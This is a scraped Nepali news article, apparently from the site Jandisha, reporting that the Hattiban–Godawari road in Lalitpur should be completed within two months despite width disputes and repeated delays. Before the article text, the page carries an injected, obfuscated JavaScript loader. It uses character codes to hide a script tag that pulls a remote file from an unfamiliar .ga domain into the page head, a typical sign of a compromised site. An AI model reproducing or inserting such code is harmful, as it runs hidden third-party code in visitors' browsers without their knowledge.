Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); गोदावरी सडक पुससम्म सम्पन्न हुने – जनदिशा

गोदावरी सडक पुससम्म सम्पन्न हुने

Last Updated Date:

काठमाडौँ। ललितपुरको हात्तीवनबाट गोदावरी कुण्डसम्मको सडक निर्माण अबको दुई महिनाभित्र सम्पन्न गरिने भएको छ । निर्माण व्यवसायीले नियमित निर्माणस्थलमा काम गरिरहेकाले बाँकी अवधिमा काम सकिने काठमाडौँ उपत्यका सडक विस्तार आयोजनाले जनाएको छ ।

यो सडक दुई ठेक्कामा निर्माण भइरहेको र दुवैको अवधि आगामी पुससम्म मात्रै भएको आयोजना प्रमुख गुरु अधिकारीले बताए । उनका अनुसार, सरकारले २० मिटर चौडाइ कायम गर्ने गरी निर्माण शुरु गरे पनि स्थानीयवासीको विरोधका कारण लामो समयसम्म काम हुन सकेको थिएन । गत पुसमा मन्त्रिपरिषद्को बैठकले विस्तारित सडक उपलब्ध चौडाइमा नै कालोपत्र गर्ने निर्णय गरेपछि सोही अनुसार काम भइरहेको छ । उनले भने, “२० मिटर चौडाइ हुनुपर्ने भए पनि अधिकांश स्थानमा त्योभन्दा कम चौडाइमा काम भइरहेको छ ।”

निर्माण शुरु भएको लामो समय भएको र पटकपटक अवधि थप भए पनि कानूनी रुपमा पुनः अवधि थप्न मिल्दैन । मापदण्डभन्दा कम चौडाइमा कालोपत्र भएपछि अरू संरचना भने भविष्यमा निर्माण गर्ने गरी निर्माण अघि बढाइएको छ । उनले भने “कतै साढे तीन मिटर चौडाइ कायम भए पनि हामीले समयमै ठेक्का सम्पन्न गर्न लागेका छौँ ।”

सात दशमलव छ किलोमिटर लम्बाइको यो सडक निर्माणको ठेक्का सम्झौता विसं २०७३ असारमा भएको आयोजनाले जनाएको छ । यो सडक निर्माणको काम आयोजनाले आशिष सिएम जेभी र लामा समानान्तर जेभीले गरिरहेको छ । यो सडक जस्तै उपत्यकामा १० सडक निर्माणाधीन छन् । तीमध्ये अधिकांशमा जग्गा र घरको मुआब्जा विवादका कारण निर्माणमा ढिलाइ भएको थियो । उपलब्ध चौडाइमै कालोपत्र गर्ने सरकारको निर्णयपछि भने अहिले अधिकांश सडकमा निर्माण अघि बढेको छ ।

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top